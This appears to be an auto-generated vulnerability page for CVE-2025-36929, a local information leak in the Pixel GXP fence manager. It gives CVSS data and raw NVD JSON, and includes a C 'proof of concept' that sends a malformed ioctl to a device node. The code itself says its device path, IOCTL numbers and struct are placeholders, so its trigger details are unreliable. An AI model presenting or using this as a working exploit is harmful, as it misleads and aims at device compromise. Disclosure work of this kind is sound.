Security Vulnerability Report
CVE-2025-36929 CVSS 5.5 MEDIUM

CVE-2025-36929

Published: 2025-12-11 20:15:57
Last Modified: 2025-12-12 17:36:05

Description

In AreFencesRegistered of gxp_fence_manager.cc, there is a possible information leak due to improper input validation. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.

CVSS Details

CVSS Score
5.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

cpe:2.3:o:google:android:-:*:*:*:*:*:*:* - VULNERABLE
Android (all devices using GXP chips)
Google Pixel 6 and newer series devices
GXP firmware versions earlier than the 2025-12-01 security patch

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```c
// CVE-2025-36929 PoC - Information Leak via GXP Fence Manager
// This is a conceptual PoC demonstrating the vulnerability; the device
// node path, IOCTL numbers and struct layout below are illustrative
// placeholders, not values taken from the affected driver.
#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
#include <inttypes.h>
#include <fcntl.h>
#include <unistd.h>
#include <sys/ioctl.h>

// GXP Fence Manager IOCTL definitions (conceptual)
#define GXP_FENCE_IOC_MAGIC 'G'
#define GXP_FENCE_ARE_REGISTERED _IOR(GXP_FENCE_IOC_MAGIC, 0x01, struct fence_info)

struct fence_info {
    uint32_t fence_id;
    uint64_t fence_ptr;
    uint32_t flags;
};

int main(int argc, char *argv[])
{
    int fd;
    struct fence_info info;

    // Open GXP device node
    fd = open("/dev/gxp-fence", O_RDWR);
    if (fd < 0) {
        printf("[-] Failed to open GXP fence device\n");
        return -1;
    }

    // Trigger information leak via improper input validation
    // in AreFencesRegistered function
    info.fence_id = 0xFFFFFFFF; // Invalid/malformed input
    info.fence_ptr = 0x0;       // NULL pointer manipulation
    info.flags = 0x00;

    printf("[*] Triggering AreFencesRegistered with crafted input\n");

    // This IOCTL call exploits improper input validation
    if (ioctl(fd, GXP_FENCE_ARE_REGISTERED, &info) == 0) {
        printf("[+] Fence info leaked: ptr=0x%" PRIx64 ", flags=0x%x\n",
               info.fence_ptr, info.flags);
        // Leaked data may contain sensitive kernel memory
    }

    close(fd);
    return 0;
}
```

References

https://source.android.com/security/bulletin/pixel/2025-12-01 (Vendor Advisory)

Raw JSON Data

```json
{"cve": {"id": "CVE-2025-36929", "sourceIdentifier": "[email protected]", "published": "2025-12-11T20:15:57.467", "lastModified": "2025-12-12T17:36:04.533", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In AreFencesRegistered of gxp_fence_manager.cc, there is a possible information leak due to improper input validation. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-20"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:google:android:-:*:*:*:*:*:*:*", "matchCriteriaId": "F8B9FEC8-73B6-43B8-B24E-1F7C20D91D26"}]}]}], "references": [{"url": "https://source.android.com/security/bulletin/pixel/2025-12-01", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}
```